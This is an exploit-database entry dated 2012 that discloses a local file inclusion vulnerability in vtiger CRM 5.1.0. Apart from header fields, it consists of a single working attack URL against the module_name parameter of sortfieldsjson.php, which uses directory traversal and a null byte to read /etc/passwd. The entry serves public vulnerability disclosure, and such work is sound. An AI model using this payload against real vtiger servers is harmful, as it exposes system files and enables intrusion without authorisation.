vtiger CRM 5.1.0 Local File Inclusion Vulnerability

2012-04-22T00:00:00
ID 1337DAY-ID-18113
Type zdt
Reporter Pi3rrot
Modified 2012-04-22T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: VTiger CRM
# Google Dork: None
# Date: 20/03/2012
# Author: Pi3rrot
# Software Link: http://sourceforge.net/projects/vtigercrm/files/vtiger%20CRM%205.1.0/
# Version: 5.1.0
# Tested on: CentOS 6
# CVE : none
 
We have find this vulnerabilitie in VTiger 5.1.0
In this example, you can see a Local file Inclusion in the file sortfieldsjson.php
 
Try this :
https://localhost/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00



#  0day.today [2018-01-01]  #